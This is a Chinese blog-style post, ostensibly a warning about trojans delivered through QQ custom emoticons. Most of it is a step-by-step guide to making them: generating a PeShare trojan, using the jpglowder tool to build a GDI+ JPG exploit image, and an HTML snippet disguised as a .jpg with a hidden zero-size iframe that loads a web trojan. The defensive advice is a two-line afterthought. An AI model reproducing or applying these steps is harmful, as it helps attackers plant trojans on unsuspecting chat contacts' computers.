提防QQ表情背后的阴谋--追踪盗号尾巴1网友发送flash动画的阴谋
相信QQ是广大网友都非常熟悉的聊天工具了。有相当一部分朋友对QQ表情十分喜爱,甚至自己制作个性化的自定义表情共享给大家。但是我们在享受各种个性化表情的时候,黑客也会通过这些表情图片悄悄进入我们的计算机种植木马,让我们防不胜防。我们应该如何应对?下面我就来个破解。 4月2号,就是我去考试的那天,一位一年不见的好友突然来电话,他说,今天游戏上突然有人加他,并说和他同个地方的,是个PP的MM,还互加QQ,给他发了照片。当时也没有注意什么,用的卡巴也没有响。只是觉得这MM好漂亮啊,要是……(省了200字都是他口水)。 没想到第二天打开电脑没多久,他就觉得电脑越来越慢,通过瑞星卡巴等杀毒软件并没有发现可疑的程序。后来系统竟然慢到假死现象。于是他重新安装系统,格式化了系统盘,依然没有效果。听到这,我就十分警觉的做了一个虚拟系统,让他把系统共享给我看。 果然,在QQ的自定义表情中,找到了那MM的照片,另外几个表情也带有木马。原来,QQ的自定义表情竟成黑客入侵通道。 一个小小的QQ如何被黑客利用成为入侵电脑的通道呢?其实QQ自定义表情传送的就是图片,那么也就容易理解这其实就是一个运用图片种植木马的伎俩。 QQ自客义表情传送的实质上就是图片,这些经过加工的图片再发给远程用户以后,图片首选会判断系统是否存在相应的漏洞。如果存在漏洞分块,图片就会激活这个漏洞,然后执行图片所带的恶意代码,从而最终成为控制远程计算机。 知道这个原理后,我来讲一下这个木马的制作过程。 首先以国产木马PeShare为例。运行PeShare.exe后,会打开一个配置的窗口,随便设置后,点击生成,随后发送到已经申请好的网上空间中。 然后有两种方法可以生成图片木马。 1利用漏洞生成 这种方法是通过windows系统以及应用程序的漏洞而产生,比如2004年的"windows GDI+JPG解析组件缓冲区溢出漏洞"、"windows图形渲染引擎安全漏洞",2005年的"MSN Messenger PNG图片解析远种代码执行漏洞",以及今年的"windows图形渲染引擎WMF格式代码执行漏洞"都是和图形图像有关的漏洞。 下面就以GDI+JPG为例,在命令提示符下激活漏洞利用工具jpglowder,查看工具便用方法。漏洞利用工会包含了多个命令参数。 要利用这个漏洞生成图片木马,只要便用工会内置参数d就可,通过输入一段含有木马的网页链接,就可以生成需要的图片木马。 2利用网页代码 这个比较容易,打开记事本,打入以下代码,另存为plmm.jpg(就是漂亮MM照片啦)。 代码如下: <html> <body> <iframe src="网页木马地址" width="0" height="0" frameborder="0"> </iframe> <center><img src="真实图片地址"></img></center> </body> </html> 这里只要一个跳转命令就可以入侵木马了,真可怕。 防范方法嘛。。。。。。。 快去www.microsoft.com下载补丁包吧。。 要不然就设置QQ不接收自定义图片好了。。 |
|